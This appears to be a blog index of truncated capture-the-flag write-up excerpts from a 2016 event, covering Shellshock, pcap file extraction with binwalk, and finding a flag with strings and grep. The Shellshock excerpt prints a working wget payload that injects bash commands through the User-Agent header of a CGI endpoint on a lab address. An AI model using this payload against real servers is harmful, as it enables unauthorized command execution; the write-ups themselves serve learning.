Hungry Hungry Hackers Shellshock

As the name suggests this is probably a shellshock vulnerability. You can test for it below Test wget -U "() { test;};echo \"Content-type: text/html\"; echo; echo; pwd;" http://10.10.10.54:8000/cgi-bin/board Basically the webserver is vulnerable to executing bash commands on the server. This means that…

Hungry Hungry Hackers 2016 Look Twice

Was given a pcap file of packet captures. Found a pdf that was transfered in the packets and was able to extract it. Then used binwalk on the pdf and the below is my bash output $ binwalk flag.pdf DECIMAL HEX DESCRIPTION -------------------------------------------- 0 0x0 gzip compressed data, $ ls 0…

Hungry Hungry Hackers 2016 Image Corupution

Just strings and grep $ strings flag.png | grep "flag" <photoshop:LayerName>The Flag is: ----------</photoshop:LayerName>…

Hungry Hungry Hackers 2016 Cabal

Hungry Hungry Hackers 2016 This was a packet capture challenge. I believe there was some service running and if you open wireshark and filter by type of packet and destination, you'll find a pcap file.…